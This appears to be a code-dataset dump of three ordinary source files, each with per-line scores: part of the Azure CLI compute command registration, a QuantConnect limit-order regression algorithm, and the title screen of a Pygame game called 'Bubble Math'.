cf_vm_ext_image, exception_handler=empty_on_404)\n", "cli_command(__name__, 'vmss extension image list-names', mgmt_path.format(op_var, op_class, 'list_types'), cf_vm_ext_image)\n", "cli_command(__name__, 'vmss extension image list-versions', mgmt_path.format(op_var, op_class, 'list_versions'), cf_vm_ext_image)\n", "cli_command(__name__, 'vmss extension image list', custom_path.format('list_vm_extension_images'))\n", "\n", "# VM Image\n", "op_var = 'virtual_machine_images_operations'\n", "op_class = 'VirtualMachineImagesOperations'\n", "cli_command(__name__, 'vm image show', mgmt_path.format(op_var, op_class, 'get'), cf_vm_image, exception_handler=empty_on_404)\n", "cli_command(__name__, 'vm image list-offers', mgmt_path.format(op_var, op_class, 'list_offers'), cf_vm_image)\n", "cli_command(__name__, 'vm image list-publishers', mgmt_path.format(op_var, op_class, 'list_publishers'), cf_vm_image)\n", "cli_command(__name__, 'vm image list-skus', mgmt_path.format(op_var, op_class, 'list_skus'), cf_vm_image)\n", "cli_command(__name__, 'vm image list', custom_path.format('list_vm_images'))\n", "\n", "# VM Usage\n", "cli_command(__name__, 'vm list-usage', mgmt_path.format('usage_operations', 'UsageOperations', 'list'), cf_usage, transform=transform_vm_usage_list,\n", " table_transformer='[].{Name:localName, CurrentValue:currentValue, Limit:limit}')\n", "\n", "# VMSS\n", "vmss_show_table_transform = '{Name:name, ResourceGroup:resourceGroup, Location:location, Capacity:sku.capacity, Overprovision:overprovision, upgradePolicy:upgradePolicy.mode}'\n", "cli_command(__name__, 'vmss delete', mgmt_path.format('virtual_machine_scale_sets_operations', 'VirtualMachineScaleSetsOperations', 'delete'), cf_vmss, no_wait_param='raw')\n", "cli_command(__name__, 'vmss list-skus', mgmt_path.format('virtual_machine_scale_sets_operations', 'VirtualMachineScaleSetsOperations', 'list_skus'), cf_vmss)\n", "\n", "cli_command(__name__, 'vmss list-instances', mgmt_path.format('virtual_machine_scale_set_vms_operations', 'VirtualMachineScaleSetVMsOperations', 'list'), cf_vmss_vm)\n", "\n", "cli_command(__name__, 'vmss create', custom_path.format('create_vmss'), transform=DeploymentOutputLongRunningOperation('Starting vmss create'), no_wait_param='no_wait', exception_handler=handle_long_running_operation_exception, table_transformer=deployment_validate_table_format)\n", "cli_command(__name__, 'vmss deallocate', custom_path.format('deallocate_vmss'), no_wait_param='no_wait')\n", "cli_command(__name__, 'vmss delete-instances', custom_path.format('delete_vmss_instances'), no_wait_param='no_wait')\n", "cli_command(__name__, 'vmss get-instance-view', custom_path.format('get_vmss_instance_view'),\n", " table_transformer='{ProvisioningState:statuses[0].displayStatus, PowerState:statuses[1].displayStatus}')\n", "cli_command(__name__, 'vmss show', custom_path.format('show_vmss'), exception_handler=empty_on_404,\n", " table_transformer=vmss_show_table_transform)\n", "cli_command(__name__, 'vmss list', custom_path.format('list_vmss'), table_transformer='[].' + vmss_show_table_transform)\n", "cli_command(__name__, 'vmss stop', custom_path.format('stop_vmss'), no_wait_param='no_wait')\n", "cli_command(__name__, 'vmss restart', custom_path.format('restart_vmss'), no_wait_param='no_wait')\n", "cli_command(__name__, 'vmss start', custom_path.format('start_vmss'), no_wait_param='no_wait')\n", "cli_command(__name__, 'vmss update-instances', custom_path.format('update_vmss_instances'), no_wait_param='no_wait')\n", "if supported_api_version(ResourceType.MGMT_COMPUTE, min_api='2017-03-30'):\n", " cli_command(__name__, 'vmss reimage', custom_path.format('reimage_vmss'), no_wait_param='no_wait')\n", "cli_command(__name__, 'vmss scale', custom_path.format('scale_vmss'), no_wait_param='no_wait')\n", "cli_command(__name__, 'vmss list-instance-connection-info', custom_path.format('list_vmss_instance_connection_info'))\n", "cli_command(__name__, 'vmss list-instance-public-ips', custom_path.format('list_vmss_instance_public_ips'))\n", "\n", "# VM Size\n", "cli_command(__name__, 'vm list-sizes', mgmt_path.format('virtual_machine_sizes_operations', 'VirtualMachineSizesOperations', 'list'), cf_vm_sizes)\n", "\n", "if supported_api_version(ResourceType.MGMT_COMPUTE, min_api='2017-03-30'):\n", " # VM Disk\n", " op_var = 'disks_operations'\n", " op_class = 'DisksOperations'\n", " cli_command(__name__, 'disk create', custom_path.format('create_managed_disk'), no_wait_param='no_wait')\n", " cli_command(__name__, 'disk list', custom_path.format('list_managed_disks'))\n", " cli_command(__name__, 'disk show', mgmt_path.format(op_var, op_class, 'get'), cf_disks, exception_handler=empty_on_404)\n", " cli_command(__name__, 'disk delete', mgmt_path.format(op_var, op_class, 'delete'), cf_disks, no_wait_param='raw', confirmation=True)\n", " cli_command(__name__, 'disk grant-access', custom_path.format('grant_disk_access'))\n", " cli_command(__name__, 'disk revoke-access', mgmt_path.format(op_var, op_class, 'revoke_access'), cf_disks)\n", " cli_generic_update_command(__name__, 'disk update', 'azure.mgmt.compute.compute.operations.{}#{}.get'.format(op_var, op_class),\n", " 'azure.mgmt.compute.compute.operations.{}#{}.create_or_update'.format(op_var, op_class),\n", " custom_function_op=custom_path.format('update_managed_disk'),\n", " setter_arg_name='disk', factory=cf_disks, no_wait_param='raw')\n", " cli_generic_wait_command(__name__, 'disk wait', 'azure.mgmt.compute.compute.operations.{}#{}.get'.format(op_var, op_class), cf_disks)\n", "\n", " op_var = 'snapshots_operations'\n", " op_class = 'SnapshotsOperations'\n", " cli_command(__name__, 'snapshot create', custom_path.format('create_snapshot'))\n", " cli_command(__name__, 'snapshot list', custom_path.format('list_snapshots'))\n", " cli_command(__name__, 'snapshot show', mgmt_path.format(op_var, op_class, 'get'), cf_snapshots, exception_handler=empty_on_404)\n", " cli_command(__name__, 'snapshot delete', mgmt_path.format(op_var, op_class, 'delete'), cf_snapshots)\n", " cli_command(__name__, 'snapshot grant-access', custom_path.format('grant_snapshot_access'))\n", " cli_command(__name__, 'snapshot revoke-access', mgmt_path.format(op_var, op_class, 'revoke_access'), cf_snapshots)\n", " cli_generic_update_command(__name__, 'snapshot update', 'azure.mgmt.compute.compute.operations.{}#{}.get'.format(op_var, op_class),\n", " 'azure.mgmt.compute.compute.operations.{}#{}.create_or_update'.format(op_var, op_class),\n", " custom_function_op=custom_path.format('update_snapshot'),\n", " setter_arg_name='snapshot', factory=cf_snapshots)\n", "\n", "op_var = 'images_operations'\n", "op_class = 'ImagesOperations'\n", "cli_command(__name__, 'image create', custom_path.format('create_image'))\n", "cli_command(__name__, 'image list', custom_path.format('list_images'))\n", "cli_command(__name__, 'image show', mgmt_path.format(op_var, op_class, 'get'), cf_images, exception_handler=empty_on_404)\n", "cli_command(__name__, 'image delete', mgmt_path.format(op_var, op_class, 'delete'), cf_images)\n", "\n", "if supported_api_version(ResourceType.MGMT_COMPUTE, min_api='2017-03-30'):\n", " cli_command(__name__, 'vm list-skus', custom_path.format('list_skus'), table_transformer=transform_sku_for_table_output)\n", " op_var = 'virtual_machine_run_commands_operations'\n", " op_class = 'VirtualMachineRunCommandsOperations'\n", " cli_command(__name__, 'vm run-command show', mgmt_path.format(op_var, op_class, 'get'), cf_run_commands)\n", " cli_command(__name__, 'vm run-command list', mgmt_path.format(op_var, op_class, 'list'), cf_run_commands)\n", " cli_command(__name__, 'vm run-command invoke', custom_path.format('run_command_invoke'))\n", "\n", "# MSI\n", "cli_command(__name__, 'vm assign-identity', custom_path.format('assign_vm_identity'))\n", "cli_command(__name__, 'vmss assign-identity', custom_path.format('assign_vmss_identity'))\n" ]
[ 0, 0, 0.010526315789473684, 0, 0, 0, 0, 0.011627906976744186, 0, 0.01020408163265306, 0, 0.010526315789473684, 0.011627906976744186, 0.011627906976744186, 0, 0.01, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.009009009009009009, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.007142857142857143, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.01098901098901099, 0, 0, 0, 0, 0, 0.009615384615384616, 0, 0, 0, 0, 0.010526315789473684, 0.012345679012345678, 0, 0, 0, 0, 0.011111111111111112, 0, 0, 0, 0, 0, 0, 0, 0, 0.004132231404958678, 0.0078125, 0.008547008547008548, 0.008547008547008548, 0.0078125, 0.00847457627118644, 0.00909090909090909, 0.009009009009009009, 0.009345794392523364, 0.008849557522123894, 0.007751937984496124, 0.011494252873563218, 0.0055248618784530384, 0.009900990099009901, 0.010752688172043012, 0, 0, 0.011627906976744186, 0, 0, 0.012048192771084338, 0, 0, 0.009708737864077669, 0, 0.012048192771084338, 0.009009009009009009, 0, 0, 0.009523809523809525, 0.009433962264150943, 0.006666666666666667, 0, 0, 0, 0.008849557522123894, 0.008771929824561403, 0.006329113924050633, 0, 0, 0, 0, 0, 0.009615384615384616, 0, 0, 0, 0.0053475935828877, 0.005050505050505051, 0.004608294930875576, 0, 0, 0.010309278350515464, 0.01, 0.009345794392523364, 0, 0, 0.0044444444444444444, 0, 0, 0, 0.008928571428571428, 0.007194244604316547, 0.009259259259259259, 0.007692307692307693, 0.012048192771084338, 0.009009009009009009, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.009900990099009901, 0.010101010101010102, 0.010638297872340425, 0, 0, 0.010752688172043012, 0.008264462809917356, 0, 0, 0.01, 0.008130081300813009, 0, 0, 0.010869565217391304, 0.011904761904761904, 0, 0, 0.00980392156862745, 0.01098901098901099, 0, 0.01, 0.011111111111111112, 0.010869565217391304, 0, 0, 0, 0, 0.00980392156862745, 0.005649717514124294, 0.007751937984496124, 0, 0, 0.012195121951219513, 0, 0, 0, 0.010869565217391304, 0.008403361344537815, 0.011627906976744186, 0.011235955056179775, 0, 0, 0, 0, 0.0070921985815602835, 0.00819672131147541, 0.0078125, 0.010309278350515464, 0, 0, 0.006993006993006993, 0.008064516129032258, 0.007692307692307693, 0.010101010101010102, 0, 0, 0, 0, 0.007874015748031496, 0.00909090909090909, 0.00847457627118644, 0.009433962264150943, 0, 0, 0, 0.006711409395973154, 0.010752688172043012, 0, 0, 0.005681818181818182, 0.005780346820809248, 0.006329113924050633, 0, 0.006024096385542169, 0, 0.0035714285714285713, 0.009523809523809525, 0.008547008547008548, 0.010638297872340425, 0.008547008547008548, 0.01, 0, 0.008264462809917356, 0.010752688172043012, 0.010101010101010102, 0.010526315789473684, 0.008547008547008548, 0, 0.009708737864077669, 0.010526315789473684, 0.00847457627118644, 0.009259259259259259, 0, 0, 0.006802721088435374, 0, 0, 0, 0, 0, 0.009174311926605505, 0.012345679012345678, 0.008064516129032258, 0.0072992700729927005, 0.011363636363636364, 0.009009009009009009, 0.007575757575757576, 0.008333333333333333, 0.010752688172043012, 0.010638297872340425, 0.007246376811594203, 0, 0, 0, 0.011904761904761904, 0.012345679012345678, 0.007575757575757576, 0.009523809523809525, 0.010416666666666666, 0.008403361344537815, 0.007352941176470588, 0.008333333333333333, 0.011235955056179775, 0.012345679012345678, 0, 0, 0, 0, 0, 0.00819672131147541, 0.010526315789473684, 0, 0, 0.008, 0, 0, 0.009174311926605505, 0.00909090909090909, 0.010752688172043012, 0, 0, 0.011627906976744186, 0.011111111111111112 ]
332
0.003848
false
# QUANTCONNECT.COM - Democratizing Finance, Empowering Individuals. # Lean Algorithmic Trading Engine v2.0. Copyright 2014 QuantConnect Corporation. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from clr import AddReference AddReference("System") AddReference("QuantConnect.Algorithm") AddReference("QuantConnect.Common") from System import * from QuantConnect import * from QuantConnect.Algorithm import * from datetime import timedelta ### <summary> ### Basic template algorithm simply initializes the date range and cash ### </summary> ### <meta name="tag" content="trading and orders" /> ### <meta name="tag" content="limit orders" /> ### <meta name="tag" content="placing orders" /> ### <meta name="tag" content="updating orders" /> ### <meta name="tag" content="regression test" /> class LimitFillRegressionAlgorithm(QCAlgorithm): def Initialize(self): '''Initialise the data and resolution required, as well as the cash and start-end dates for your algorithm. All algorithms must initialized.''' self.SetStartDate(2013,10,7) #Set Start Date self.SetEndDate(2013,10,11) #Set End Date self.SetCash(100000) #Set Strategy Cash # Find more symbols here: http://quantconnect.com/data self.AddEquity("SPY", Resolution.Second) def OnData(self, data): '''OnData event is the primary entry point for your algorithm. Each new data point will be pumped in here.''' if data.ContainsKey("SPY"): if self.IsRoundHour(self.Time): negative = 1 if self.Time < (self.StartDate + timedelta(days=2)) else -1 self.LimitOrder("SPY", negative*10, data["SPY"].Price) def IsRoundHour(self, dateTime): '''Verify whether datetime is round hour''' return dateTime.minute == 0 and dateTime.second == 0 def OnOrderEvent(self, orderEvent): self.Debug(str(orderEvent))
[ "# QUANTCONNECT.COM - Democratizing Finance, Empowering Individuals.\n", "# Lean Algorithmic Trading Engine v2.0. Copyright 2014 QuantConnect Corporation.\n", "#\n", "# Licensed under the Apache License, Version 2.0 (the \"License\");\n", "# you may not use this file except in compliance with the License.\n", "# You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0\n", "#\n", "# Unless required by applicable law or agreed to in writing, software\n", "# distributed under the License is distributed on an \"AS IS\" BASIS,\n", "# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n", "# See the License for the specific language governing permissions and\n", "# limitations under the License.\n", "\n", "from clr import AddReference\n", "AddReference(\"System\")\n", "AddReference(\"QuantConnect.Algorithm\")\n", "AddReference(\"QuantConnect.Common\")\n", "\n", "from System import *\n", "from QuantConnect import *\n", "from QuantConnect.Algorithm import *\n", "from datetime import timedelta\n", "\n", "### <summary>\n", "### Basic template algorithm simply initializes the date range and cash\n", "### </summary>\n", "### <meta name=\"tag\" content=\"trading and orders\" />\n", "### <meta name=\"tag\" content=\"limit orders\" />\n", "### <meta name=\"tag\" content=\"placing orders\" />\n", "### <meta name=\"tag\" content=\"updating orders\" />\n", "### <meta name=\"tag\" content=\"regression test\" />\n", "class LimitFillRegressionAlgorithm(QCAlgorithm):\n", "\n", " def Initialize(self):\n", " '''Initialise the data and resolution required, as well as the cash and start-end dates for your algorithm. All algorithms must initialized.'''\n", "\n", " self.SetStartDate(2013,10,7) #Set Start Date\n", " self.SetEndDate(2013,10,11) #Set End Date\n", " self.SetCash(100000) #Set Strategy Cash\n", " # Find more symbols here: http://quantconnect.com/data\n", " self.AddEquity(\"SPY\", Resolution.Second)\n", "\n", " def OnData(self, data):\n", " '''OnData event is the primary entry point for your algorithm. Each new data point will be pumped in here.'''\n", " if data.ContainsKey(\"SPY\"):\n", " if self.IsRoundHour(self.Time):\n", " negative = 1 if self.Time < (self.StartDate + timedelta(days=2)) else -1\n", " self.LimitOrder(\"SPY\", negative*10, data[\"SPY\"].Price)\n", "\n", " def IsRoundHour(self, dateTime):\n", " '''Verify whether datetime is round hour'''\n", " return dateTime.minute == 0 and dateTime.second == 0\n", "\n", " def OnOrderEvent(self, orderEvent):\n", " self.Debug(str(orderEvent))\n" ]
[ 0, 0.012345679012345678, 0, 0, 0, 0.011764705882352941, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.047619047619047616, 0.037037037037037035, 0.02702702702702703, 0.03225806451612903, 0, 0.07142857142857142, 0.013888888888888888, 0.06666666666666667, 0.018867924528301886, 0.02127659574468085, 0.02040816326530612, 0.02, 0.02, 0.02040816326530612, 0, 0, 0.006578947368421052, 0, 0.05555555555555555, 0.05660377358490566, 0.017241379310344827, 0, 0, 0, 0, 0.00847457627118644, 0, 0, 0.011235955056179775, 0, 0, 0, 0, 0, 0, 0, 0 ]
55
0.010849
false
# "Bubble Math" # Developed RL Vision (www.rlvision.com) # Source code licensed under GPLv3 (see LICENSE.txt) # Dev Env: Portable Python 2.7.5.1 (Python2/Windows/Pygame/PyScripter) # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # Title.py # This module displays the title screen. # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # import pygame import os from pygame.locals import * # Bubble Math imports import text import button import util from gameflow import * class Title: """ Displays the title screen """ def __init__(self, game ): self.game = game # load assets try: self.imgTitleBG = pygame.image.load( os.path.join('gfx', 'title.png') ).convert() self.imgButtons = pygame.image.load( os.path.join('gfx', 'buttons.png') ).convert_alpha() self.sfxClick = pygame.mixer.Sound( os.path.join('sfx', 'click.ogg') ) except: self.game.fatalError(self.game.strings["error_title_assets"]) # setup button rectangles self.rectButton1Area = Rect(196 , 419 , 190 , 49) self.rectButton2Area = Rect(420 , 419 , 190 , 49) # setup exit button self.game.buttonHandler.append(button.Button(self.game, (10, 10), self.imgButtons, Rect(0, 0, 26, 26), Rect(32, 0, 26, 26), self.btnExit_Click, self.sfxClick )) # setup mute button btn = button.Button(self.game, (SCREEN_WIDTH-80 , 11), self.imgButtons, Rect(0, 32, 31, 23), Rect(32, 32, 31, 23), self.btnSound_Click, self.sfxClick) btn.setAlternativeSourceImage(Rect(0, 64, 31, 23), Rect(32, 64, 31, 23)) if self.game.audio.muted: btn.toggleSourceImage() self.game.buttonHandler.append(btn) # setup fullscreen button btn = button.Button(self.game, (SCREEN_WIDTH-35 , 10), self.imgButtons, Rect(0, 96, 25, 25), Rect(32, 96, 25, 25), self.btnFullscreen_Click, self.sfxClick) btn.setAlternativeSourceImage(Rect(0, 128, 25, 25), Rect(32, 128, 25, 25)) if self.game.fullscreen: btn.toggleSourceImage() self.game.buttonHandler.append(btn) # setup flag buttons self.game.buttonHandler.append(button.Button(self.game, (SCREEN_WIDTH-65, SCREEN_HEIGHT-70 ) , self.imgButtons , Rect(0, 160, 24, 18), Rect(32, 160, 24, 18), self.btnEnglish_Click, self.sfxClick )) # english self.game.buttonHandler.append(button.Button(self.game, (SCREEN_WIDTH-35, SCREEN_HEIGHT-70 ) , self.imgButtons , Rect(0, 192, 24, 18), Rect(32, 192, 24, 18), self.btnSwedish_Click, self.sfxClick )) # swedish # setup start button btn = button.Button(self.game, (SCREEN_WIDTH/2 -95 ,370), self.imgButtons, Rect(0, 224, 191, 49), Rect(0, 288, 191, 49), self.btnStart_Click, self.sfxClick) btn.setText(self.game.strings["new_game"], 16, COLOR_BUTTON_TEXT, 'freesansbold.ttf' ) self.game.buttonHandler.append(btn) # setup help button btn = button.Button(self.game, (SCREEN_WIDTH/2 -95 ,435), self.imgButtons, Rect(0, 224, 191, 49), Rect(0, 288, 191, 49), self.btnHelp_Click, self.sfxClick) btn.setText(self.game.strings["how_to_play"] , 16 , COLOR_BUTTON_TEXT , 'freesansbold.ttf' ) self.game.buttonHandler.append(btn) # setup difficulty button btn = button.Button(self.game, (SCREEN_WIDTH/2 -60 , 500), self.imgButtons, Rect(0, 448, 120, 33), Rect(136, 448, 120, 33), self.btnDifficulty_Click, self.sfxClick) txt = self.game.strings["easy"] if self.game.difficulty == DIFF_MEDIUM: txt = self.game.strings["medium"] if self.game.difficulty == DIFF_HARD: txt = self.game.strings["hard"] btn.setText(txt, 14, COLOR_BUTTON_TEXT, 'freesansbold.ttf') btn.setTextPosition(text.ALIGN_CENTER, 0, -1) self.game.buttonHandler.append(btn) # Button click handlers def btnStart_Click(self, btn): self.game.fadeTo(GM_GAME) def btnHelp_Click(self, btn): self.game.fadeTo(GM_HELP,False) def btnDifficulty_Click(self, btn): if self.game.difficulty == DIFF_EASY: self.game.difficulty = DIFF_MEDIUM elif self.game.difficulty == DIFF_MEDIUM: self.game.difficulty = DIFF_HARD elif self.game.difficulty == DIFF_HARD: self.game.difficulty = DIFF_EASY txt = self.game.strings["easy"] if self.game.difficulty == DIFF_MEDIUM: txt = self.game.strings["medium"] if self.game.difficulty == DIFF_HARD: txt = self.game.strings["hard"] btn.setText(txt, 14, COLOR_BUTTON_TEXT, 'freesansbold.ttf') btn.setTextPosition(text.ALIGN_CENTER, 0, -1) def btnExit_Click(self, btn): self.game.fadeTo(GM_QUIT) def btnFullscreen_Click(self, btn): self.game.screen = util.toggle_fullscreen() self.game.fullscreen = not self.game.fullscreen btn.toggleSourceImage() def btnSound_Click(self, btn): self.game.audio.toggleMute() btn.toggleSourceImage() def btnEnglish_Click(self, btn): self.game.fadeTo(GM_TITLE,False) self.game.setLanguage("en") def btnSwedish_Click(self, btn): self.game.fadeTo(GM_TITLE,False) self.game.setLanguage("se") def update(self): pass def draw(self): # draw backdrop & credits text at bottom self.game.screen.blit(self.imgTitleBG, (0, 0)) text.drawText(self.game.screen, self.game.strings["credits"], SCREEN_WIDTH / 2, SCREEN_HEIGHT - 16, 13, (11, 85, 114), 'freesansbold.ttf', text.ALIGN_CENTER)
[ "# \"Bubble Math\"\n", "# Developed RL Vision (www.rlvision.com)\n", "# Source code licensed under GPLv3 (see LICENSE.txt)\n", "# Dev Env: Portable Python 2.7.5.1 (Python2/Windows/Pygame/PyScripter)\n", "# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n", "# Title.py\n", "# This module displays the title screen.\n", "# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n", "\n", "import pygame\n", "import os\n", "from pygame.locals import *\n", "\n", "# Bubble Math imports\n", "import text\n", "import button\n", "import util\n", "from gameflow import *\n", "\n", "\n", "class Title:\n", "\t\"\"\" Displays the title screen \"\"\"\n", "\n", "\tdef __init__(self, game ):\n", "\n", "\t\tself.game = game\n", "\n", "\t\t# load assets\n", "\t\ttry:\n", "\t\t\tself.imgTitleBG = pygame.image.load( os.path.join('gfx', 'title.png') ).convert()\n", "\t\t\tself.imgButtons = pygame.image.load( os.path.join('gfx', 'buttons.png') ).convert_alpha()\n", "\t\t\tself.sfxClick = pygame.mixer.Sound( os.path.join('sfx', 'click.ogg') )\n", "\t\texcept:\n", "\t\t\tself.game.fatalError(self.game.strings[\"error_title_assets\"])\n", "\n", "\t\t# setup button rectangles\n", "\t\tself.rectButton1Area = Rect(196 , 419 , 190 , 49)\n", "\t\tself.rectButton2Area = Rect(420 , 419 , 190 , 49)\n", "\n", " # setup exit button\n", "\t\tself.game.buttonHandler.append(button.Button(self.game, (10, 10), self.imgButtons, Rect(0, 0, 26, 26), Rect(32, 0, 26, 26), self.btnExit_Click, self.sfxClick ))\n", "\n", " # setup mute button\n", "\t\tbtn = button.Button(self.game, (SCREEN_WIDTH-80 , 11), self.imgButtons, Rect(0, 32, 31, 23), Rect(32, 32, 31, 23), self.btnSound_Click, self.sfxClick)\n", "\t\tbtn.setAlternativeSourceImage(Rect(0, 64, 31, 23), Rect(32, 64, 31, 23))\n", "\t\tif self.game.audio.muted: btn.toggleSourceImage()\n", "\t\tself.game.buttonHandler.append(btn)\n", "\n", " # setup fullscreen button\n", "\t\tbtn = button.Button(self.game, (SCREEN_WIDTH-35 , 10), self.imgButtons, Rect(0, 96, 25, 25), Rect(32, 96, 25, 25), self.btnFullscreen_Click, self.sfxClick)\n", "\t\tbtn.setAlternativeSourceImage(Rect(0, 128, 25, 25), Rect(32, 128, 25, 25))\n", "\t\tif self.game.fullscreen: btn.toggleSourceImage()\n", "\t\tself.game.buttonHandler.append(btn)\n", "\n", "\t\t# setup flag buttons\n", "\t\tself.game.buttonHandler.append(button.Button(self.game, (SCREEN_WIDTH-65, SCREEN_HEIGHT-70 ) , self.imgButtons , Rect(0, 160, 24, 18), Rect(32, 160, 24, 18), self.btnEnglish_Click, self.sfxClick )) \t# english\n", "\t\tself.game.buttonHandler.append(button.Button(self.game, (SCREEN_WIDTH-35, SCREEN_HEIGHT-70 ) , self.imgButtons , Rect(0, 192, 24, 18), Rect(32, 192, 24, 18), self.btnSwedish_Click, self.sfxClick )) \t# swedish\n", "\n", "\t\t# setup start button\n", "\t\tbtn = button.Button(self.game, (SCREEN_WIDTH/2 -95 ,370), self.imgButtons, Rect(0, 224, 191, 49), Rect(0, 288, 191, 49), self.btnStart_Click, self.sfxClick)\n", "\t\tbtn.setText(self.game.strings[\"new_game\"], 16, COLOR_BUTTON_TEXT, 'freesansbold.ttf' )\n", "\t\tself.game.buttonHandler.append(btn)\n", "\n", "\t\t# setup help button\n", "\t\tbtn = button.Button(self.game, (SCREEN_WIDTH/2 -95 ,435), self.imgButtons, Rect(0, 224, 191, 49), Rect(0, 288, 191, 49), self.btnHelp_Click, self.sfxClick)\n", "\t\tbtn.setText(self.game.strings[\"how_to_play\"] , 16 , COLOR_BUTTON_TEXT , 'freesansbold.ttf' )\n", "\t\tself.game.buttonHandler.append(btn)\n", "\n", "\t\t# setup difficulty button\n", "\t\tbtn = button.Button(self.game, (SCREEN_WIDTH/2 -60 , 500), self.imgButtons, Rect(0, 448, 120, 33), Rect(136, 448, 120, 33), self.btnDifficulty_Click, self.sfxClick)\n", "\t\ttxt = self.game.strings[\"easy\"]\n", "\t\tif self.game.difficulty == DIFF_MEDIUM: txt = self.game.strings[\"medium\"]\n", "\t\tif self.game.difficulty == DIFF_HARD: txt = self.game.strings[\"hard\"]\n", "\t\tbtn.setText(txt, 14, COLOR_BUTTON_TEXT, 'freesansbold.ttf')\n", "\t\tbtn.setTextPosition(text.ALIGN_CENTER, 0, -1)\n", "\t\tself.game.buttonHandler.append(btn)\n", "\n", "\n", "\t# Button click handlers\n", "\n", "\tdef btnStart_Click(self, btn):\n", "\t\tself.game.fadeTo(GM_GAME)\n", "\n", "\tdef btnHelp_Click(self, btn):\n", "\t\tself.game.fadeTo(GM_HELP,False)\n", "\n", "\tdef btnDifficulty_Click(self, btn):\n", "\t\tif self.game.difficulty == DIFF_EASY: self.game.difficulty = DIFF_MEDIUM\n", "\t\telif self.game.difficulty == DIFF_MEDIUM: self.game.difficulty = DIFF_HARD\n", "\t\telif self.game.difficulty == DIFF_HARD: self.game.difficulty = DIFF_EASY\n", "\n", "\t\ttxt = self.game.strings[\"easy\"]\n", "\t\tif self.game.difficulty == DIFF_MEDIUM: txt = self.game.strings[\"medium\"]\n", "\t\tif self.game.difficulty == DIFF_HARD: txt = self.game.strings[\"hard\"]\n", "\t\tbtn.setText(txt, 14, COLOR_BUTTON_TEXT, 'freesansbold.ttf')\n", "\t\tbtn.setTextPosition(text.ALIGN_CENTER, 0, -1)\n", "\n", "\tdef btnExit_Click(self, btn):\n", "\t\tself.game.fadeTo(GM_QUIT)\n", "\n", "\tdef btnFullscreen_Click(self, btn):\n", "\t\tself.game.screen = util.toggle_fullscreen()\n", "\t\tself.game.fullscreen = not self.game.fullscreen\n", "\t\tbtn.toggleSourceImage()\n", "\n", "\tdef btnSound_Click(self, btn):\n", "\t\tself.game.audio.toggleMute()\n", "\t\tbtn.toggleSourceImage()\n", "\n", "\tdef btnEnglish_Click(self, btn):\n", "\t\tself.game.fadeTo(GM_TITLE,False)\n", "\t\tself.game.setLanguage(\"en\")\n", "\n", "\tdef btnSwedish_Click(self, btn):\n", "\t\tself.game.fadeTo(GM_TITLE,False)\n", "\t\tself.game.setLanguage(\"se\")\n", "\n", "\n", "\tdef update(self):\n", "\t\tpass\n", "\n", "\tdef draw(self):\n", "\t\t# draw backdrop & credits text at bottom\n", "\t\tself.game.screen.blit(self.imgTitleBG, (0, 0))\n", "\t\ttext.drawText(self.game.screen, self.game.strings[\"credits\"], SCREEN_WIDTH / 2, SCREEN_HEIGHT - 16, 13, (11, 85, 114), 'freesansbold.ttf', text.ALIGN_CENTER)\n" ]
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.02857142857142857, 0, 0.07142857142857142, 0, 0.05263157894736842, 0, 0.0625, 0.14285714285714285, 0.047058823529411764, 0.043010752688172046, 0.04054054054054054, 0.2, 0.015384615384615385, 0, 0.03571428571428571, 0.07692307692307693, 0.07692307692307693, 0, 0.03571428571428571, 0.024539877300613498, 0, 0.03571428571428571, 0.026143790849673203, 0.013333333333333334, 0.038461538461538464, 0.02631578947368421, 0, 0.029411764705882353, 0.02531645569620253, 0.012987012987012988, 0.0392156862745098, 0.02631578947368421, 0, 0.043478260869565216, 0.02843601895734597, 0.02830188679245283, 0, 0.043478260869565216, 0.031446540880503145, 0.033707865168539325, 0.02631578947368421, 0, 0.045454545454545456, 0.03164556962025317, 0.06315789473684211, 0.02631578947368421, 0, 0.03571428571428571, 0.023952095808383235, 0.029411764705882353, 0.02631578947368421, 0.027777777777777776, 0.016129032258064516, 0.020833333333333332, 0.02631578947368421, 0, 0, 0.08, 0, 0.0625, 0.03571428571428571, 0, 0.03225806451612903, 0.058823529411764705, 0, 0.02702702702702703, 0.02666666666666667, 0.025974025974025976, 0.02666666666666667, 0, 0.029411764705882353, 0.02631578947368421, 0.027777777777777776, 0.016129032258064516, 0.020833333333333332, 0, 0.03225806451612903, 0.03571428571428571, 0, 0.02702702702702703, 0.021739130434782608, 0.02, 0.038461538461538464, 0, 0.03125, 0.03225806451612903, 0.038461538461538464, 0, 0.029411764705882353, 0.05714285714285714, 0.03333333333333333, 0, 0.029411764705882353, 0.05714285714285714, 0.03333333333333333, 0, 0, 0.10526315789473684, 0.14285714285714285, 0, 0.058823529411764705, 0.023255813953488372, 0.02040816326530612, 0.0125 ]
125
0.025691
false
